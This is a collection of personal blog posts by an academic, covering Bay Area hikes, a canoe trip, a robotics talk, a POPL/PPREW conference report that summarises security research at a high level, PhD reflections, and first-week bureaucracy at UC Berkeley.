2013-03-09T21:15:00-05:00

For two weekends in a row we went for nice day hikes in Tilden regional park / Wildcat canyon. The area is very nice and the views of San Francisco and the bay area are awesome. We prepared both hikes by looking at the GeoCaching website and planning a couple of caches that we wanted to lift during our hike. Both hikes are fairly long day hikes with a length of roughly 10mi (15km).

Trail navigation

For the first hike we started off at Little Farm where we parked our car as well. The trail starts right next to the parking lot and is not clearly marked. Basically just turn straight left when from the parking lot and follow the sign to Jewel Lake.

For the second hike we started in Richmond. The trailhead is right at the parking lot and the trail continues right where the road ends. Both times we did not have any trouble finding a parking spot but we heard that it can get more crowded in the summer. At both spots there is overflow parking next to the main parking lots (it might add a couple of hundred feet to your overall journey). Please also watch out for the opening hours of the park as the gates will be closed off hours.

Hike description

Both hikes are fairly long but still fair day hikes which are at times a bit strenuous but overall not too exhausting. Especially on the north-eastern side the elevation is a bit higher and it can be a climb to get up there. As a reward you get awesome views of the bay, the different bridges, and San Francisco.

For the first hike we started from Little Farm, passed Jewel Lake and continued along Wildcat Creek (the little river) until we arrived at the Mezue Trail where we headed up to the ridge and returned in a loop back to Little Farm.

The second hike started at the opposite side of Tilden Park (which is called Wildcat Canyon). We started at the trailhead there and went straight up to the ridge to enjoy the views, walked past the Mezue trail and turned down to the Wildcat Creek where we walked back to the parking lot. View Map

Summary

All in all two very relaxing and enjoyable Sunday hikes; we brought our lunches and 1/2 gallon of water per person and had a great time. There were some people around (especially near the trailheads) but the further you wander into the park the less people you will see. One of the things that amazes me most with this park is that it is so close to the urban area while it is very quite when you are in the park. On one hand you see the skyline of San Francisco on the other hand you can see eagles soar for pray. And for the geocachers out there: there is an awesome trial of roughly 20 GeoCaches along the Wildcat Creek. Happy hunting ;)

Tilden regional park: Vollmer peak

2013-02-24T20:04:00-05:00

A quick and easy 7.2mi (12km) hike in Tilden park with awesome views of the bay area, including San Francisco, the golden gate bridge, Oakland, Emeryville, the bay bridge, silicon valley and much more.

We set off really late (at around 11:30am) and just drove up to Grizzly peek road where we parked the car at a trailhead. Unfortunately I forgot my GPS and we did not have access to the detailed OpenStreetMap maps and got lost once or twice with the park map.

The hike was an easy non-strenuous hike and we set an easy pace of like 2miles per hour (3km/h). Actually we had to stop every couple of minutes to enjoy the awesome and impressive views of the area. It's a great and easy hike if you only have half a day but still want to get out of the city.

View the hike on the map.

Robots, wildlife and bioinspiration

2013-02-21T06:32:00-05:00

Sangbae Kim, professor in mechanical engineering from MIT visited Berkeley today and gave a great inspiring talk on dynamic locomotion. The original title of the talk was "Toward Highly Dynamic Locomotion: Actuation, structure and control of the MIT cheetah robot".

An early model of the cheetah robot. Image (c) biomimetics.

In the talk Sangbae told us about some of the awesome robots (e.g., the iSprawl fast and dynamic cockroach, or the Gecko stickybot that walks up walls) they are building in his lab and focused on details of the cheetah robot, a bioinspired, cheetah-like, quadro-legged robot that walks, trots, and runs with speeds up to 18.5 miles per hour. While it was not exactly clear for me why they are building this robot (maybe because it's just awesome to have a robotic cheetah in your backyard - I just hope that they do not plan to use those robots to hunt people) he did a great job on explaining all the different research problems they had to solve.

The three problems he talked about in detail are:

Power: you need to have enough power to keep the robot running in the wild for a while. This problem exists even in nature where cheetahs are completely exhausted after a hunt. Large parts of energy are dissipated as heat before it can be used to bring the robot into motion. Some grad students are working on better models that reduce the power consumption and maximize the time the robot can move. In addition, the cheetah regenerates power from reverse motion (comparable to regenerative braking in battery powered electric vehicles).

Motors: a second big problem are reliable motors that deliver high torque at low speed. Currently the market offers mostly low torque but high rotation speed motors. These motors are good to build, e.g., a quadrocopter but they do not work well for a robot as a robot needs fine-grained control over the motion and sensor feedback (e.g., with how much force a surface is touched). A low torque high speed motor needs a gear box between the motor and the tip which makes sensing using just the motor a hard problem. A high torque low speed motor can directly be coupled with the tip and functions as a sensor as well, removing the need for additional sensors and/or complex gear boxes. This simplifies the design and makes the robots more robust. His lab even switched to building their own motors for the cheetah that have an optimized design to offer as much torque as needed.

Stability: wild cheetahs use their tail for stability, to save them from a fall, or to enable fast direction changes which helps them catch their prey. Songbae's group added a tail to their cheetah that enables the robot to recover from miss-steps: "a tail basically buys you time". If a lateral force pushes the robot to the side then the tail can swing and counteract that motion. The robot then reacts to the force and has time to calculate a counter measure.

Video of the running robot. There are a ton more videos on the biomimetics website.

As a side note: after the talk I wanted to learn more about cheetahs and watched the following video about real cheetahs. It's a great video about the cruelty of nature and how hard animals (both beast and prey) have to fight for survival.

The talk was not focused on computer systems or even computer science related, nevertheless it was a very accessible and fun talk. I did not understand all the mechanical and mechatronical details but was able to follow most of the presented material. And let's just be honest: robots are awesome and I at least always wanted to build these awesome things!

Hiking and Geo Caching along the Miller/Knox Regional Shoreline / the Keller Beach Park

2013-02-17T19:01:00-05:00

Today we went off for another short 'warm-up' hike before the big hiking seasons starts. We drove to Richmond, CA where we walked along the shoreline, explored some old railroad tracks, discovered some brick houses (and factories), enjoyed the view over almost the complete bay area, and strolled through Richmond's old town.

Lumi searched the map for a nice spot and suggested that we head to Richmond. First of all, we did not really plan this hike and just quickly made a couple of sandwiches before we headed off towards Richmond. So far, I always remembered Richmond as a pass-through town on the way to Vallejo or the mall where Walmart is located. But I was pleasantly surprised by the great spot we found.

We parked our car right after the tunnel on Dornan Drive and explored Keller Beach Park first. The park has an awesome partial bay view, some nice BBQ spots and is even a sandy beach. Apparently, it is possible to swim here in summer and we will definitively return when the water is a bit warmer.

Leaving the beach park we walked along the shoreline (and along old rusty train tracks) up to "Ferry Point". In older times this point was the final stop of the Chicago to San Francisco train line. At this point the train stopped and the passengers continued the last 7 miles of their journey with a steam ferry over to San Francisco. It was amazing to see the old barks and tracks that partially fell into the water. As an engineer it was particularly interesting to see a seesaw-like structure that must have been used to roll railroad wagons onto the ferry. After we've watched the local fishers for some time we continued towards and old Kiln (a brick factory) where we had a good look at the chimney and the two burning chambers. It is interesting to know that many houses were first built as brick houses and people switched only later to wood only houses (and we asked ourselves: why?).

We continued towards a hill where we pushed ourselves up a steep incline. The way up was tough but we were rewarded with an awesome view of the bay area. Amazing is the only word that can describe that view! We enjoyed our time there, walked back and forth a bit (found a couple of caches) and finally walked back to the car.

On the way back we stopped in the old town of Richmond and strolled through the little streets for a bit and wondered if Richmond already looked like that during the gold rush. All in all we had a great afternoon and enjoyed the time out in the California sun. All in all the big loop is about 5.9mi (roughly 10km) and it took us about 4 hours with a couple of stops on the way and 7 geo caches. A nice hike for a lazy Sunday afternoon.

View Ferry Point Loop Trail in a larger map

Pictures

Little Duckling (travel bug) continues his journey but stops for the nice view.

The tracks to the seesaw are already broken down but the seesaw is still intact.

Good bye Richmond, it was a pleasure to see your nice side!

All paths lead to Rome: POPL and PPREW from a syssec perspective

2013-02-13T17:28:00-05:00

A week in Rome: what could be better than sitting all day in a conference room?

POPL (Principles Of Programming Languages) is one of these great conferences that have been around forever and sound very interesting to any systems person. The definition of POPL according to the SIGPLAN homepage is: "Principles of Programming Languages symposium addresses fundamental principles and important innovations in the design, definition, analysis, and implementation of programming languages, programming systems, and programming interfaces.". During my PhD I was in a very (computer) systems and compiler oriented group and POPL always sounded like a fun conference. So I was quite happy when I got some of my older PhD work accepted for the PPREW (Program Protection and Reverse Engineering Workshop) that was co-located with POPL this year. The 2013 POPL venue was in Rome, Italy which was even better!

The POPL conference

Before the conference I quickly browsed through the conference program, recognized some names (hi Vijay D'Silva, Daniel Kroening, Ben Livshits, and Domagoj Babic) and some of the papers sounded quite intriguing (although I feared that I would have some trouble understanding the overly theoretical papers and talks).

The keynote on the first day by Georges Gonthier (MS Research) was mostly about proving theorems in Coq (a theorem prover) and examples on how to user Coq (which did help me understand the whole theorem proving world).

The highlight of the first day was Vijay D'Silva's talk about Abstract conflict driven learning (unfortunately I did not find a free PDF version of this paper). I really enjoyed his presentation (he's a great speaker) and the paper was added towards the top of my reading stack.

The second keynote by Shriram Krishnamurthi (Brown University) discussed that JavaScript and HTML are basically evil languages that have no built in safety concepts. Missing language abstractions and full implicit trust of all external library functions (e.g., any included JavaScript library like the JQuery library has full access to all data of a website; all code runs under the same privilege domain with the same priorities) makes it hard for websites to reuse existing libraries. Shriram discussed sandboxing approaches and other language approaches to overcome this problem.

The highlight talk of the second day was Ben Livshits (MS Research) talk Towards fully automatic placement of security sanitizers and declassifiers A sanitizer is a function that cleans an user-defined input string from any potentially malicious/bad character sequences (e.g., escape characters if the string is used for an SQL statement, or JavaScript tags, if the string is used as part of an HTML page). A problem is that most sanitizers are neither idempotent (i.e., the cannot be executed repeatedly on the same data without chaning the data) nor reversible (i.e., removing bad characters cannot be undone). Ben argues that programmers are unable to place these sanitizers at the correct location and an automatic analysis tool will do a better job. The core of their analysis piggy backs on existing compiler data-flow techniques and uses both a static and a dynamic component. The static component uses node-based placement of security classifiers for most of the statically detected input sources. The remaining input sources are tagged dynamically and use a dynamic data flow tracking to add sanitizers at runtime. So for most of the input flows the algorithm is able to determine the location of the sanitizer statically while for some remaining sanitizers the algorithm falls back to a dynamic approach.

I really liked the presentation and when Ben visited Berkeley one week after POPL I took the opportunity to talk to him a bit before his (re-)presentation. What bugs me a bit is that the approach is limited to strings (so no full data tracking for all kinds of data flows) and that the strings remain static during the process. If strings are used/concatenated during the execution then some additional special sanitizers must be added that tag part of the string (i.e., assume that an SQL string is being built up from multiple sources: then the approach cannot handle partial strings or concatenated strings).

The keynote of the third day was by Noah Goodman (Stanford) and he talked about principles and practice of probabilistic programming. The talk focused about how we can deal with uncertainty: an easy solution is to extend the current value system and add a probabilistic component to it. After the motivation he moved towards Lambda calculus and explained how basic Lambda calculus can be extended with stochastic methods. I really liked his presentation and was able to follow through most of the talk although the focus of the talk was not exactly in my comfort zone.

The highlight talk of the third day was Sigma*: Symbolic Learning of Stream Filters by Matko Botincan and Domagoj Babic. They presented a nice concept of how they can the learning of a symbolic model of an application. They present an iterative process that generates both under-approximations (using dynamic symbolic execution) and over-approximations (using counter-example guided abstraction refinement) of an application. During each step they use an SMT solver to test for equivalence. If the two approximations are not equal then they either extend the under-approximation or shorten the over-approximation until they reach a fixpoint.

The PPREW workshop

After three days of POPL I was looking forward to a more low-level, computer-systems related, and machine-code oriented workshop and PPREW (Program Protection and Reverse Engineering Workshop) met and exceeded my expectations.

First of all, (Jeffrey) Todd McDonald gave a great introduction and welcomed us all to the 2nd incarnation of this workshop. He hopes to grow the workshop in the future and to attract more academic work in the areas of program protection and reverse engineering.

Arun Lakhotia (University of Lousiana at Lafayette) gave the keynote and talked about Fast Location of Similar Code Fragments Using Semantic 'Juice' (BinJuice). We have to move away from the old question wheter a binary is 'bad'/malicious or not and move towards the question who is actually responsible for the malicious code. His idea is to remap malware as an information retrieval problem: find the closest match of a new (malware) sample to existing code in a large code library; or partition all your samples inside the library into classes and families. As a next step it is possible to use machine learning to classify similarity. Code is related through code evolution (bug fixes, capabilities, code reuse, shared libraries).

A prerequisite is defining features that can be used to classify individual executables. As part of this research they evolved the features using different forms of abstractions: use a sequence of n bytes; use disassembled text; use disassembled text without relocations, or use n-mnemonic words (je push) (push movl).

An important finding is that current malware does only block level transformations. Semantics catch any changes inside a block, a remaining problem is if unused registers are used for bogus computation across control blocks.

The first talk was by Jack W. Davidson (University of Virginia) about Software Protection for Dynamically-Generated Code. The focus of this work is program protection: slowing down reverse engineering of a piece of code. If code is available then reverse engineering will always be possible, the question is how fast the 'bad guys' will be able to crack a software protection. Jack proposes Process-level virtualization (PVM): using a binary-dynamic translator that dynamically decrypts encrypted portions of a binary executable at runtime. A static compilation process adds additional guards into the executable, encodes specific the binary and encrypts it using some key.

The second talk was Mathias Payer's (aka your humble author, currently PostDoc at UC Berkeley) talk about String Oriented Programming: When ASLR is Not Enough. In this talk Mathias discusses protection mechanisms of current systems and their drawbacks. Data Execution Prevention (DEP) is a great solution against code injection while other forms of code-reuse attacks like Return Oriented Programming (ROP) are still possible. Address Space Layout Randomization (ASLR) and Stack canaries are a probabilistic protection against data overwrite attacks that rely on a secret that is shared with all code in the process. Any information leak can be used to reveal that secret and to break the probabilistic protection. String Oriented Programming is an approach that exploits format string bugs to write special static regions in regularly compiled executables to redirect control flow to carefully prepared invocation frames on the stack without triggering a stack canary mismatch and circumventing ASLR and DEP as well.

In the third talk Viviane Zwanger talked about Kernel Mode API Spectroscopy for Incident Response and Digital Forensics. In the talk Viviane presented her ideas on "API spectroscopy": she measures API function calls of kernel drivers, classifies these function calls into different groups, counts number of calls per group, and uses the a feature vector based on the number of function calls to classify potentially malicious drivers. The analysis is based on a static approach where she uses kernel debugging functionality to get a dump of the kernel memory image to extract individual drivers. The static analysis then counts each function call and generates the feature vector.

In the last talk Martial Bourquin presented BinSlayer: Accurate Comparison of Binary Executables. He told us that there is no good way to compare two different binaries. The only tool that is readily available is Halvar Flake's BinDiff tool which relies mostly on a bunch of heuristics. Martial extends BinDiff with a better similarity metric by analyzing the callgraph and collapsing similar entries.

Final remarks

All in all I must say that I enjoyed my stay in Rome. Both conferences where interesting: meeting people during POPL and peeking into the theorem proofing and formal verification world was certainly challenging and broadening my view. PPREW on the other hand felt like home: I was aware of the related work, knew my area, and I was surrounded by friendly like-minded people.

Golden Gate bridge, Point Bonita lighthouse and light hike around the Rodeo lagoon

2013-02-10T17:19:00-05:00

On our first hike of the new year we set off for the Golden Gate bridge, Point Bonita lighthouse and beyond. We got up relatively late as we only planned a very light hike as the first hike of 2013. The weather was actually perfect and we set off with blue sky and a nice 15 degrees Celsius (59 degrees Fahrenheit). The drive to the Golden Gate recreational area was quite unspectacular: we drove over the Richmond - San Rafael bridge and continued on Highway 101 until we reached the park.

Our first stop was at Hendrik Point where we enjoyed the best view of the Golden Gate bridge ever. This is the most touristy spot in the area but also closest to the bridge. We were very lucky as there was no fog and we had an unobstructed view of the bridge and San Francisco. The next stop was at Hawk Hill which is already less touristy. The view is great and you can pass through a tunnel to the 'other side' and enjoy the view of the sea side and the lighthouse. Shortly thereafter we had dinner at the Bicentennial Campground and enjoyed the great views of the bridge while we ate our sandwiches.

The third stop was near the lighthouse Point Bonita. The parking close to the lighthouse is usually full but there is an overflow parking 0.2 miles from the trail head. The trail is a short walk of roughly 0.8 km (0.5 mi) and leads through an old tunnel to the amazing Point Bonita lighthouse. Enjoy the amazing view and be amazed by the breaking waves at the bottom of the rocks.

To top it off we then walked to Rodeo Cove / Rodeo Lagoon beach and started our extended hike around the Rodeo lagoon. When we reached the beach we continued on the Coastal trail and passed Battery Townsley and continued to Hill 88, tracked back Miwok trail and passed the historic Nike Missile seat on our way back to the car. All in all it was an easy 10 km (6.3 mi) hike that marked the start of this years hiking season.

View hike on a map

Picture time

View of the Golden Gate bridge right from Hendrik Point.

Great view of the whole bridge with some sunlight glare from the side. It was a wonderful day!

View towards Point Bonita lighthouse from Hawk Hill.

View towards the bridge from the campground where we ate lunch.

My lovely wife with the Rodeo Beach in the background.

Awesome view from Point Bonita lighthouse. The sound and view of the rolling surf hitting the rocks are amazing.

Breath-taking view from Point Bonita towards the Golden Gate bridge.

Summary

All in all it was a great hike and we enjoyed most of it. Sometimes it was a bit too cold or a bit too hot (depending on whether we were just walking in the sun or the wind was blowing from the sea) but if you dress accordingly you will enjoy yourself. Just cross your fingers for the perfect weather (thanks to Robert for being our lucky charm and bringing the good weather from New York).

Russian River Canoedeling

2012-10-06T22:11:00-04:00

For a change this post is not about a hike but about a canoe trip that we did on the Russian river. We got up early in the morning to arrive at Burke's Canoe Trips around 11am. After a short safety message and shelving over 60$ per canoe (one canoe fits two to three persons) we can head off to grab our canoes. What follows is a mellow journey down river that lasts for about 5-6 hours and features paddeling, swimming, some adrenaline rushes, and lots of beautiful scenery.

Trip description

This is a very easy trip that almost anyone can do. Burke's canoe trips ensures that you can swim and you must wear a swim vest at all times. It is important that you bring a cooler (or backpack) with enough food and drink for the day (consumption of alcohol is not allowed). A pro tip: use trash bags to seal your backpack and leave all valuables (and electronic gadgets) in your car as the canoe might tip and you get a nice refreshment! Although we were careful canoers, we tipped once when we got stuck on top of tree stump that reached halfway out of the water (and some girls in a canoe crashed into us when we were struggling to get free of said stump). In addition, the stream velocity can be high in some spots. Overall we were paddling for around 3-4 hours with roughly two hours of drying up or just relaxing on the beaches alongside the river.

The way back was a lot quicker than the journey down stream.

Picture time

Starting our journey.

Some detour through the bushes.

Wildlife alongside the river.

The ducks were inspecting our canoes.

Summary

It was a very fun day trip that I would do again. We underestimated the thrill factor and the current once when we tipped but it was never dangerous as we were wearing our vests. Just watch out for your valuables and gadgets - they might not like to get wet!

Muir Woods hike

2012-10-05T21:44:00-04:00

Muir Woods National Monument is a very special park as you see many redwood groves with huge trees. The park features two short loops down in the valley that pass along a couple of different redwood groves. These loops are like highways, almost paved, and well looked-after.

Trail navigation

We parked on the lower parking area near the visitor center. There is only limited parking and especially on weekends you might have to fall back to the Muir Woods shuttle service that transports you from overflow parking to the trail heads. We started on one of the bigger loops and headed off on another trail when we got bored from the 'highway'-like over accessible trails. After following some steep inclines we made it up to the scenic highway and slowly circled back to the main trail. View Map

Hike description

The hike was an easy 5 mi (8.2km) stroll and we passed hundreds of huge redwood trees. The incline was not too steep and offered additional views of younger redwood groves along the valley.

Picture time

My parents at the trailhead to Muir Woods

One of the large redwood trees.

On the incline up to the top.

A huge amount of smaller (younger) trees.

Summary

The hike is very easy going and can be done in roughly two hours. It is easy to walk and large parts of the hike are on paved roads. Remember to bring 1 liter of water per person.

Lake Anza stroll

2012-09-30T19:13:00-04:00

Today was a sunny late September lazy Sunday and we just wanted to get out to enjoy the sun and relax a little. We packed our bag with swimsuits, enough water, some carrots, sweets, and sun lotion and set off for Lake Anza in Tilden Regional Park. As a side quest we added some GeoCaches onto our GPS.

Trail navigation

Trail navigation was not easy in Tilden National Park. According to the map that we saved from an earlier visit the only parking close to any trailhead was either right at the lake or at the botanical garden. So we drove down to the botanical garden and took a short stroll through the magical garden. If you have more time: go to the visitor center and get informed about all the details of the plants around you. We then headed off to the Selby trail - luckily we had our GPS with us as there were no signs nearby. When we finally found the trailhead (next to an unmarked parking) we started a nice stroll around the lake switching from the Selby to the Gorge trail and back to the botanical garden. View Map

Stroll description

The short stroll is only 3 miles (4.75km) and very easy going. You can dive off to discover some GeoCaches on the sides of the trail and most of the area is covered by trees. At the south-west side of the lake there is an artificial beach (with lifeguards on duty). We stayed there for 2 to 3 hours and enjoyed the last bit of sun. You can bath there as well and there are showers and changing rooms nearby.

Summary

The stroll was non-demanding and easy going. Sometimes you have to climb over some stones but nothing drastic. We enjoyed the warm beginning-of-autumn day and went for a nice (and chilly) swim in lake Anza. This stroll would be a great tour for kids as well!

PhD: expectations and reality

2012-09-21T05:37:00-04:00

Introduction

Deciding to do a PhD is a huge commitment as you are just dedicating a couple of years of your life to a single cause. When I decided to do a PhD in 2006 I was not completely sure what would expect me. I just finished my master of science (MSc) at ETH Zurich and I knew that I really liked working on the research project that I chose. On the other hand I worked in programming and web development for the last couple of years to finance my studies and I discovered that only doing project/programming work is too boring for me. I had no clear picture how the PhD would be like, but I assumed that it would be a combination of a continuation of the research I did during my master thesis, writing papers, going to conferences to present your research, and in the end writing a thesis that proofs your thesis statement.

Many others before me have already blogged or written books about the life as a PhD student, how to carry out a PhD, defined what research, yet I think that I can add my two cents to the existing stories. My experiences are still fresh (I started my PhD in 2006, defended beginning of May 2012, and started my PostDoc here at UC Berkeley in September 2012) and I hope that I can give a good description about the qualitative aspects of a PhD.

The three phases of a research PhD

In my time as a PhD student at ETH Zurich I had uncounted discussions with peers, assistant professors, professors, researchers, and people related to academia. During these discussions we discovered that a PhD can be segmented into three basic phases: the first phase identifies the research topic and bootstraps the student; the second phase is the productive phase where the research bears fruits and is turned into papers (or at least communicated to other people); and the last phase consists in wrapping up, writing the thesis, and finally the defense. Every successful PhD student goes through three phases during his PhD. Each phase has different requirements and relies on different personality aspects. The phases follow after each other but there is no clear transition from one phase to the other yet one knows if the transition completed.

The search for the holy grail: ramping up and finding your topic

The first phase of a PhD is like the 'get to know each other' phase at the beginning of a relationship. You don't really know what to expect but you are interested and you want to explore. Yes, there are some peculiarities but you are not too concerned about that right now. In this first phase you dig into the field that is interesting to you and you start reading up about prior research approaches about the problem you want to tackle. Some ideas start to form in your head and you decide on a topic for your thesis. In more practical research areas you start building prototypes and you execute small tests; in more theoretical areas you try to come up with some theorems and you have a rough idea about the general topic.

Depending on your adviser he or she will restrict your search in one way or another. The most restrictive adviser tells you exactly what you should do (sometimes they have a grant proposal for a specific project and/or only need a code monkey to implement their grand idea) other advisers let you run free and let you come up with your own idea in a (sub-)field. Both extremes have their advantages and the kind of adviser that is best for you is basically an optimization problem that you need to solve for yourself.

On one end of the scale you are given a topic by your adviser. This approach ensures that your adviser cares/should care deeply about your project and it gives you a head start, on the other hand you'll have to make up for this pre-selection and you'll have a harder time to bring in your own (research) ideas into the already existing project. On the other end you can choose your topic in an open void. It is up to you to make your adviser care about the project and you need to come up with the core idea. This great opportunity usually results in additional time needed to complete this phase. In the real world your adviser will usually set the limits anywhere between these two extremes.

From my experience I would say that the average student stays in this phase from one to three years. I was lucky enough to have an adviser that allowed me to choose freely in any field that he was comfortable with. During my first three years I discussed a huge set of possible research ideas with him and even after we had settled on a specific topic the details kept changing as I passed through the later phases. Two key aspects in this phase are: (i) creativity, you need to come up with a good research idea and research plan. Nobody will tell you what to do, there is neither a customer who demands a specific feature, nor is there a pre-set plan like in a play. You need to be focused and keep yourself together to pass through this phase. (ii) Due to the fact that you need an idea and you are responsible for the schedule you build up a huge amount of psychological pressure. Most people that drop out during this phase fail due to either a lack of ideas (and creativity) or because they are unable to self-organize themselves in an unstructured work environment.

The paper mill

After you have decided on the (main) topic of your thesis and built the first prototype (or come up with the first layout of the system) you gradually transition from the first phase to the second phase. You are now trapped in the paper mill. This is the most productive phase as you try to publish your work in as many (good) conferences as possible. The quality of your work is (somewhat) measured in the number of papers that you publish at top tier conferences. You are evaluated based on the quality of your work combined with the human factor how you present yourself.

In this phase you start to become an expert in your field: you have claimed a little spot in a bigger field that you extend with your research. Your adviser will try to keep you in this phase as long as you are able to produce more good papers (given that your adviser has enough funding and that you do not run into any hard time limits given by your university).

The core qualifications for this phase are that you can (i) work hard and (ii) present yourself at conferences. You have to write all these papers and at the same time you should refill your pipeline of ideas to get the next publications in order. In addition you have to express all these ideas to others and you have to play the social game at conferences. Building your social network during conferences is actually hard work and you need to try to make friends with some of the bigger shots in your field as this can be helpful for future collaborations, additional papers, or even reviews. If other people understand your ideas from beginning to end and you can convince them (in person) that the ideas are great then they are more likely to accept your paper that they'll review later on. This (productive) phase usually lasts about two years and is your opportunity to build your social network for possible future positions. A side quest during this time is to select your thesis committee. You already know in what area you will write your thesis about, you should have an idea about your thesis statement, and you should know who the experts are in this area. Hint: conferences are a good place to chat up possible committee members!

The exit strategy: wrapping up and writing your thesis

After you churned out a bunch of papers during your time on the paper mill you are finally ready to graduate. At one point in time you start to feel ready, you have published a couple of papers (or at least written a couple of technical reports if you weren't able to publish the papers) and you developed a good understanding of what research in your area is about. In your (regular or not so regular) meetings with your adviser you should also get a feeling if he or she thinks that you are ready.

At ETH you write your thesis from scratch. I started with reading (or at least skimming) my prior papers before I wrote my thesis. After that I came up with the basic outline and the vision that my thesis should get across. The goal of the thesis is to write down your thesis statement and to prove said statement. It is important that your thesis is a self-contained and self-consistent document.

In this phase you should have settled on your thesis committee. Your committee consists of a couple of professors (or people with a PhD depending on your university) that are experts in your area of research. These experts will read your thesis and grill you during your defense. Some people quit at this late stage of the PhD due to timing constraints or due to burn out. After a couple of years they are worn out and run into deadlines imposed by their adviser or by the university. It makes me sad when I see colleagues that come up to this point in their career and then quit so close to the finish line.

The defense is the end of this last phase and after you have passed this final test you have almost completed your PhD. At most universities there are some bureaucratic hurdles that are left for you to take and there might be some minor (or major) revisions to your written thesis that you have to carry out. Other than that you are done and at some delta t after the defense you are allowed to call yourself PhD (or Dr. Sc in my case).

The teaching aspect in a PhD

Teaching is an orthogonal experience to the research experience. At ETH you are supposed to be the teaching assistant (TA) for one lecture per semester. At the beginning you will start off as a regular TA but as you progress in your PhD you will be trusted with more and more responsibilities, e.g. you will teach lectures if the professor is sick, or you will be head TA for a complete lecture. Head TAs are responsible to coordinate the lecture, to supervise the other TAs, and to organize the individual exercises.

I really enjoyed teaching during my almost 5 1/2 years at ETH and I think that it is a great experience that every PhD should have. During the exercise hours that you have to supervise you learn how to speak in front of a group (a skill that is not that common in Switzerland and that is not part of the regular curriculum at high school or college), you learn how to prepare the material so that you can present it to a group of students, and most importantly you learn how to interact with all kinds of students that have different problems with the material, the course, or a specific exercise. All in all you learn a new skill: how to teach some specific material to students. If you plan an academic career then this might come in handy at one point in time.

The PhD grind

Right when I was finishing my thesis Philip Guo published his memoirs about his own PhD experience in an e-book called "The PhD Grind". In the book Philip tells us about his PhD experience year for year in chronological order. Each year of his PhD is covered in a chapter and he writes about all the ups and downs during that time. The book is a great read and I warmly recommend that you read it too if you are interested in research and academia.

I agree with many of his observations, e.g., that it is important that you focus on conferences that your adviser already has published in recent years. Your adviser will know the right lingo and the right buzzwords for the conference and the members of the committee will know your adviser which in turn will help as well.

On the other hand there are a couple of things where I don't agree with Philip. Most importantly Philip mentioned that being a TA only delays the PhD (page 70, of the e-book). As I explained above I really valued the teaching experience - from a personal as well as from a professional point of view. During the discussions with the students I learned several new and interesting details in areas that I actually assumed to know in depth. Another area I don't agree with Philip is about how to select your thesis committee. Philip tells us that usually the adviser selects the thesis committee (page 56, of the e-book), I on the other side had the pleasure to select my own committee. I discussed possible members of the committee with my adviser and then approached each member myself. For me this was an interesting experience - first coming up with possible and plausible fits and then approaching these professors myself.

Conclusion

A PhD is certainly not the right career path for everyone. Doing a PhD is challenging, requires a lot of self-control and self-organization. The PhD is not (pre-)structured and you will need a lot of creativity. In addition you get less pay than an industry position with a comparable education. On the other hand you learn a huge amount of new skills during your PhD. This is your opportunity to do academic research, you can publish at conferences, you'll meet a huge amount of new people, and you learn to network. I enjoyed my time and I recommend doing a PhD to all the curious and interested people out there that are interested in academia and who want to go that extra mile.

Bootstrapping at UC Berkeley

2012-09-17T17:51:00-04:00

Today I had my first day at UC Berkeley in Dawn Song's group and I must say that it was quite an intensive day! Most of the time went into going through all the bureaucratic processes here at Berkeley. I always thought that ETH Zurich was bad, but the bureaucratic pain at ETH is peanuts compared to bureaucracy here at Berkeley.

The bureaucratic pain started about 3 weeks ago where I got an email that I had to attend a special Berkeley Visa meeting (also called SIM meeting). The meeting was on the following day (when we were still on holiday). So I rushed up to the International House and attended this meeting. Before the presentation we were handed a booklet and had to register with our passports and DS-2019s. Attending the presentation was mandatory and you only get your travel authorization (if you want to travel during your J1 PostDoc) if you attend this meeting. So I waited in the auditorium and read the booklet. Twice. And the presentation covered the material in the booklet in more or less slow-retard mode (i.e. very detailed and precise so that everybody would get it).

On my first day I had an appointment with ERSO to get my contract set and settled. As a typical Swiss I arrived 5 to 9 and was greeted with a warm welcome. Unfortunately the person I had an appointment with had her day off today so I was handled by somebody else. All in all I had to fill out around 15 forms, enter my personal information about 10 times, and sign the documents 12 times or so. This process took 1/2 an hour and got me a Berkeley employee ID (which will be needed later on).

The next step was meeting with Dawn Song's awesome Barbara Goto who handles access to the offices and hardware distribution. So I signed in with her and we went to the building administration to get me a key for the office (where I had to pay a 5$ deposit). To get access on the (wired and wireless) network you need an EECS account, administered by IRIS. So I went back to Cory Hall to talk to the IRIS guys and got myself registered. The registration is a 3-way process: you register, your PI has to sign it off, you reregister and authenticate yourself using your Cal ID.

When I returned from IRIS Glacier had sent me an email that my employee ID had gone through the first system and that I needed to fill out some (online) forms. So off I went. For taxation Galcier needed all my visits _ever_ to the US with exact date and length of date (which is almost double digits in my case and a pain to enter on their website). To fill out these forms you need your DS-2019 and your position code which is available on your contract.

Now I would also like to have a Cal ID, which is the main form of authentication for campus services. Unforunately I have to wait two days until all the forms I just filled out have rippled through nightly batch jobs and are processed by the different systems. To get the Cal ID you need your employee number as well but with the Cal ID you get access to the recreational sport facilities, AC transit (bus) passes, and much more. Unfortunately I have to wait for two more days. This section concludes my bureaucratic nightmare of the first day, it was already past noon and I have not yet talked to the other guys here.

My next point on the list was a quick meeting with Dawn who pointed me to Lenx to get all the necessary information. Lenx filled me up on all the currently running projects and told me when the group meetings are. Basically ask your group members to get on all the mailing lists, get access to the internal wikis, the GIT repositories, and the SVN. Then I was also told to order laptops and desktops. Dawn offered me one of these retina a MacBook Pro laptops, but I declined and opted for another Lenovo: this time I'll get an X230 with 24 hours of battery life and less than 3lb (1.3kg) weight. Compared to 6 hours battery life and 4.4lb (2kg) of the MacBook Pro. A conference laptop should be lightweight and should last through the regular conference day, so travel light, travel energy efficient!

Now I'm looking forward what the next day will bring! :)

Addendum

It's now Thursday and I hope to have finished all the bureaucratic stuff that I had to do. Basically you need to get an employee ID (at the ERSO office). The employee ID registers you in all the major databases and kick-starts your payroll. Then you have to register your tax services at Glacier to ensure correct taxation of your payroll, you need to setup accounts and fill out all the online forms at AYSO and BLU; these four services (ERSO, AYSO, Glacier, and BLU) ensure your payroll. After that you need to go to Garnett-Powers to select a health-care plan. If you (and your wife) have social security number you might be able to fill out the form online at AYSO. Otherwise you need to go to the Garnett-Powers homepage and fill out the online form, print it, and hand it over to the ERSO guys.

The next step is to generate an IRIS account so that you get an email account, can logon the internal network and wired network, and can register devices. You have to go there to create an account, wait until your account is approved, and go there a second time to set all your passwords. The IRIS account depends on your employee number. For a bunch of other services you will need a Cal1Card. You have to wait 1-2 days until all the data is batch processed, then you'll have to go to the Cal1Card office (at the student services) which will then issue your PostDoc ID card plus an account token. With your employee number and the account token you'll be able to generate a Cal1 account. The Cal1Card depends on your employee number.

